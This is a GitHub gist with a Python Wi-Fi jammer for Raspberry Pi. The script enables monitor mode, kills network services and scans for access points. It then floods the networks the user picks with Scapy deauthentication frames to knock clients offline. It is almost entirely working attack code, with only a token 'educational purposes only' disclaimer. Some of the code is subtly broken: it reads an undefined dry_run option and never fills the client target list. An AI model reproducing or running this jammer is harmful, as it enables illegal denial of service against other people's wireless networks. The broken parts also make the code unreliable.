Last active
July 26, 2025 18:56
-
-
Save softdream1981/22a9616ff1c9c88ba862888c57dbe4d0 to your computer and use it in GitHub Desktop.
jam
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # -*- coding: UTF-8 -*- | |
| # | |
| # Optimized for Raspberry Pi 3 on Raspbian - Fully Interactive | |
| # | |
| # Description: This script is a Wi-Fi jammer that first asks which interface to use, | |
| # scans for networks, then asks which network to attack. | |
| # | |
| # WARNING: This script is for educational purposes only. | |
| # Jamming Wi-Fi networks is illegal in most countries. | |
| # Use this script only on networks you own and have permission to test. | |
| import struct | |
| import socket | |
| import argparse | |
| import time | |
| import sys | |
| import os | |
| import re | |
| import logging | |
| import platform | |
| from signal import SIGINT, signal | |
| from subprocess import Popen, PIPE, DEVNULL | |
| from threading import Thread, Lock | |
| from typing import List, Set, Tuple, Optional | |
| # Import fcntl only on Unix-based systems (like Raspbian) | |
| if platform.system() != 'Windows': | |
| import fcntl | |
| # Configure Scapy for performance | |
| from scapy.all import ( | |
| Dot11, Dot11Deauth, Dot11Elt, Dot11Beacon, | |
| Dot11ProbeResp, conf, sniff, send | |
| ) | |
| # Suppress Scapy's verbose warnings to keep the output clean | |
| logging.getLogger("scapy.runtime").setLevel(logging.ERROR) | |
| conf.verb = 0 | |
| # --- Console Colors for better readability --- | |
| W = '\033[0m' # white (normal) | |
| R = '\033[31m' # red | |
| G = '\033[32m' # green | |
| O = '\033[33m' # orange | |
| B = '\033[34m' # blue | |
| P = '\033[35m' # purple | |
| C = '\033[36m' # cyan | |
| GR = '\033[37m' # gray | |
| T = '\033[93m' # tan | |
| def parse_args(): | |
| """Parses command line arguments for advanced/non-interactive use.""" | |
| parser = argparse.ArgumentParser( | |
| description="An interactive Wi-Fi jammer optimized for Raspberry Pi." | |
| ) | |
| # Add arguments for non-interactive/scripted use | |
| parser.add_argument("-i", "--interface", help="For non-interactive use: specify monitor interface.") | |
| parser.add_argument("-a", "--accesspoint", nargs='*', default=[], help="For non-interactive use: target specific APs.") | |
| parser.add_argument("-c", "--channel", help="Listen and deauth on a specific channel only.") | |
| parser.add_argument("--scan-time", type=int, default=15, help="Time in seconds to scan for APs (default: 15).") | |
| # ... other args for advanced control | |
| parser.add_argument("-s", "--skip", nargs='*', default=[], help="Skip deauthing specific MAC addresses.") | |
| parser.add_argument("-t", "--timeinterval", type=float, default=0.001, help="Time between deauth packets.") | |
| parser.add_argument("-p", "--packets", type=int, default=1, help="Number of packets per deauth burst.") | |
| parser.add_argument("--count", type=int, default=0, help="Stop after sending a specific number of deauth packets.") | |
| parser.add_argument("-v", "--verbose", action='store_true', help="Enable verbose output for debugging.") | |
| return parser.parse_args() | |
| ######################################## | |
| # Interface Info and Manipulation | |
| ######################################## | |
| def select_interface() -> str: | |
| """Lists available wireless interfaces and prompts the user to select one.""" | |
| print(f"[{G}*{W}] Finding available wireless interfaces...") | |
| # Use 'iw dev' to find wireless interfaces | |
| try: | |
| proc = Popen(['iw', 'dev'], stdout=PIPE, stderr=DEVNULL) | |
| output = proc.communicate()[0].decode() | |
| # Filter for physical interfaces, ignore virtual ones like 'p2p' or existing 'mon' | |
| interfaces = [iface for iface in re.findall(r'Interface (\w+)', output) if 'mon' not in iface and 'p2p' not in iface] | |
| except FileNotFoundError: | |
| sys.exit(f'[{R}-{W}] "iw" command not found. Please install it (`sudo apt-get install iw`).') | |
| if not interfaces: | |
| sys.exit(f'[{R}-{W}] No wireless interfaces found. Connect a compatible wireless adapter and try again.') | |
| print(f"[{G}?{W}] Please select the interface to use for the attack:") | |
| for i, iface in enumerate(interfaces): | |
| print(f" [{T}{i}{W}] {iface}") | |
| while True: | |
| try: | |
| choice = int(input(f"\n[{G}>_<{W}] Enter the number of the interface: ")) | |
| if 0 <= choice < len(interfaces): | |
| return interfaces[choice] | |
| else: | |
| print(f"[{R}!{W}] Invalid selection. Please choose a number between 0 and {len(interfaces)-1}.") | |
| except ValueError: | |
| print(f"[{R}!{W}] Invalid input. Please enter a number.") | |
| def start_mon_mode(interface: str) -> str: | |
| """Enables monitor mode on a wireless interface.""" | |
| mon_iface = f"{interface}mon" | |
| print(f'[{G}+{W}] Starting monitor mode on {G}{interface}{W}...') | |
| try: | |
| # Using airmon-ng is often more reliable on Raspberry Pi | |
| os.system(f'airmon-ng check kill >/dev/null 2>&1') | |
| proc = Popen(['airmon-ng', 'start', interface], stdout=PIPE, stderr=PIPE) | |
| proc.communicate() | |
| # Verify that the monitor interface was created | |
| proc_check = Popen(['iw', 'dev'], stdout=PIPE, stderr=DEVNULL) | |
| output = proc_check.communicate()[0].decode() | |
| if mon_iface in output: | |
| print(f'[{G}+{W}] Monitor mode enabled on {G}{mon_iface}{W}') | |
| return mon_iface | |
| else: | |
| sys.exit(f'[{R}-{W}] Could not start monitor mode on {interface}. Check if the adapter supports it.') | |
| except FileNotFoundError: | |
| sys.exit(f'[{R}-{W}] `airmon-ng` not found. Please install aircrack-ng (`sudo apt-get install aircrack-ng`).') | |
| except Exception as e: | |
| sys.exit(f'[{R}-{W}] Error starting monitor mode: {e}') | |
| def remove_mon_iface(mon_iface: str) -> None: | |
| """Disables monitor mode on a wireless interface.""" | |
| print(f'[{G}+{W}] Disabling monitor mode on {G}{mon_iface}{W}...') | |
| try: | |
| os.system(f'airmon-ng stop {mon_iface} >/dev/null 2>&1') | |
| except Exception as e: | |
| print(f'[{R}-{W}] Error removing monitor mode: {e}') | |
| def get_mac_address(iface: str) -> str: | |
| """Gets the MAC address of an interface.""" | |
| try: | |
| s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) | |
| info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', bytes(iface, 'utf-8')[:15])) | |
| mac = ':'.join(f'{b:02x}' for b in info[18:24]) | |
| print(f'[{G}*{W}] Monitor interface: {G}{iface}{W} | MAC: {O}{mac}{W}') | |
| return mac | |
| except Exception as e: | |
| print(f'[{R}-{W}] Could not get MAC for {iface}: {e}') | |
| return "00:00:00:00:00:00" | |
| ######################################## | |
| # Main Logic | |
| ######################################## | |
| def channel_hop(mon_iface: str, args) -> None: | |
| """Continuously hops through Wi-Fi channels.""" | |
| global monchannel, stop_hopper | |
| channel_num = 0 | |
| max_channel = 13 if 'world' in args and args.world else 11 | |
| while not stop_hopper: | |
| if args.channel: | |
| with lock: | |
| monchannel = args.channel | |
| else: | |
| channel_num = (channel_num % max_channel) + 1 | |
| with lock: | |
| monchannel = str(channel_num) | |
| try: | |
| proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], | |
| stdout=DEVNULL, stderr=PIPE) | |
| proc.communicate() | |
| except OSError: | |
| print(f'[{R}-{W}] Could not execute "iw". Halting channel hopper.') | |
| return | |
| # During attack phase, update the screen | |
| if not first_pass: | |
| output(None, monchannel) | |
| if not args.dry_run: | |
| deauth(monchannel, args) | |
| time.sleep(0.1) # Prevent CPU overload | |
| def deauth(monchannel: str, args) -> None: | |
| """Sends deauthentication packets to all targets on the current channel.""" | |
| # This function remains largely the same as the previous version | |
| pkts = [] | |
| with lock: | |
| # Directed deauths | |
| for client, ap, ch, *_ in clients_APs: | |
| if ch == monchannel: | |
| pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth(reason=7) | |
| pkt2 = Dot11(addr1=ap, addr2=client, addr3=client) / Dot11Deauth(reason=7) | |
| pkts.extend([pkt1, pkt2]) | |
| # Broadcast deauths | |
| if not ('directedonly' in args and args.directedonly): | |
| for ap, ch, *_ in APs: | |
| if ap in args.accesspoint and ch == monchannel: | |
| broadcast_pkt = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap) / Dot11Deauth(reason=7) | |
| pkts.append(broadcast_pkt) | |
| if pkts: | |
| send(pkts, inter=args.timeinterval, count=args.packets, verbose=0) | |
| def output(err: Optional[str], monchannel: str) -> None: | |
| """Clears the screen and displays the current status.""" | |
| os.system('clear') | |
| print(f'[{G}+{W}] Interface: {G}{mon_iface}{W} | Channel: {G}{monchannel}{W} | Targets: {T}{len(clients_APs)}{W}') | |
| if clients_APs: | |
| print(f'\n{"-"*60}') | |
| print(f'{"Deauthing Client":<20} {"From AP":<20} {"CH":<4} {"ESSID"}') | |
| print(f'{"-"*60}') | |
| with lock: | |
| for ca in clients_APs[:15]: | |
| essid = ca[3] if len(ca) > 3 else 'N/A' | |
| print(f'[{T}*{W}] {O}{ca[0]:<17}{W} - {O}{ca[1]:<17}{W} - {ca[2]:<2} - {T}{essid}{W}') | |
| print('') | |
| def packet_handler(pkt) -> None: | |
| """Callback function for Scapy's sniff(). Processes captured packets.""" | |
| global clients_APs, APs | |
| if not pkt.haslayer(Dot11): return | |
| try: | |
| addr3 = pkt.addr3.lower() | |
| if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp): | |
| if not any(addr3 in ap for ap in APs): | |
| ssid = pkt[Dot11Elt].info.decode('utf-8', 'ignore') | |
| channel = str(ord(pkt[Dot11Elt:3].info)) | |
| with lock: | |
| APs.append([addr3, channel, ssid]) | |
| except (IndexError, AttributeError, TypeError): | |
| pass | |
| def stop(signal=None, frame=None) -> None: | |
| """Graceful shutdown handler.""" | |
| global stop_hopper | |
| print(f"\n\n[{G}+{W}] Shutting down...") | |
| stop_hopper = True | |
| time.sleep(0.5) | |
| if 'mon_iface' in globals() and mon_iface: | |
| remove_mon_iface(mon_iface) | |
| print(f"[{G}+{W}] Restoring network services...") | |
| os.system('service NetworkManager restart >/dev/null 2>&1 || service network-manager restart >/dev/null 2>&1') | |
| print(f"[{G}+{W}] Cleanup complete. Exiting.") | |
| sys.exit(0) | |
| def select_ap_interactively(): | |
| """Prompts the user to select APs to target.""" | |
| with lock: | |
| if not APs: | |
| print(f"[{R}!{W}] No access points found during scan. Try a different adapter or location.") | |
| return | |
| # Sort APs by name for easier viewing | |
| sorted_aps = sorted(APs, key=lambda x: x[2]) | |
| print(f"\n[{G}?{W}] Scan complete. Please select the access point(s) to attack.") | |
| print(f"{'ID':^5}|{'BSSID':^20}|{'CH':^5}|{'ESSID':^30}") | |
| print(f"{'-'*65}") | |
| for i, ap in enumerate(sorted_aps): | |
| essid = ap[2] | |
| print(f"{i:^5}|{ap[0]:^20}|{ap[1]:^5}|{T}{essid:<30}{W}") | |
| while True: | |
| try: | |
| choice = input(f"\n[{G}>_<{W}] Enter AP ID(s) (e.g., 0,2,3), 'a' for all, or 'q' to quit: ") | |
| if choice.lower() == 'q': | |
| stop() | |
| if choice.lower() == 'a': | |
| args.accesspoint = {ap[0] for ap in sorted_aps} | |
| print(f"[{G}+{W}] Targeting all {len(sorted_aps)} access points.") | |
| break | |
| selected_ids = [int(i.strip()) for i in choice.split(',')] | |
| targets = set() | |
| for i in selected_ids: | |
| if 0 <= i < len(sorted_aps): | |
| targets.add(sorted_aps[i][0]) # Target by BSSID for reliability | |
| if targets: | |
| args.accesspoint = targets | |
| print(f"[{G}+{W}] Targeting BSSID(s): {', '.join(targets)}") | |
| break | |
| else: | |
| print(f"[{R}!{W}] Invalid selection.") | |
| except ValueError: | |
| print(f"[{R}!{W}] Invalid input. Please enter numbers separated by commas, 'a', or 'q'.") | |
| if __name__ == "__main__": | |
| if os.geteuid() != 0: | |
| sys.exit(f'[{R}-{W}] This script requires root privileges. Please run with sudo.') | |
| args = parse_args() | |
| # --- Global Variables --- | |
| clients_APs: List[List[str]] = [] | |
| APs: List[List[str]] = [] | |
| lock = Lock() | |
| stop_hopper = False | |
| first_pass = True | |
| monchannel = '1' | |
| mon_iface = None | |
| # --- Setup --- | |
| signal(SIGINT, stop) | |
| # 1. Ask user to select an interface | |
| selected_iface = select_interface() | |
| # 2. Start monitor mode on the selected interface | |
| mon_iface = start_mon_mode(selected_iface) | |
| conf.iface = mon_iface | |
| mon_MAC = get_mac_address(mon_iface) | |
| # 3. Scan for APs for 15 seconds | |
| scan_time = 15 | |
| print(f"\n[{G}+{W}] Scanning for Access Points for {scan_time} seconds...") | |
| hopper_thread = Thread(target=channel_hop, args=(mon_iface, args), daemon=True) | |
| hopper_thread.start() | |
| sniff(iface=mon_iface, prn=packet_handler, timeout=scan_time) | |
| stop_hopper = True # Stop the hopper thread after scanning | |
| hopper_thread.join() # Wait for it to finish | |
| # 4. Ask user to select an access point | |
| select_ap_interactively() | |
| if not args.accesspoint: # If user quit or didn't select anything | |
| print(f"[{R}!{W}] No access point selected. Exiting.") | |
| stop() | |
| # --- Main Attack Loop --- | |
| print(f"\n[{G}+{W}] Starting attack. Press CTRL+C to stop.") | |
| first_pass = False | |
| stop_hopper = False | |
| attack_hopper_thread = Thread(target=channel_hop, args=(mon_iface, args), daemon=True) | |
| attack_hopper_thread.start() | |
| # In the attack phase, we don't need to sniff anymore, just deauth. | |
| # The channel_hop thread now handles calling deauth(). | |
| # We just need to keep the main thread alive. | |
| try: | |
| while True: | |
| time.sleep(1) | |
| except KeyboardInterrupt: | |
| stop() | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment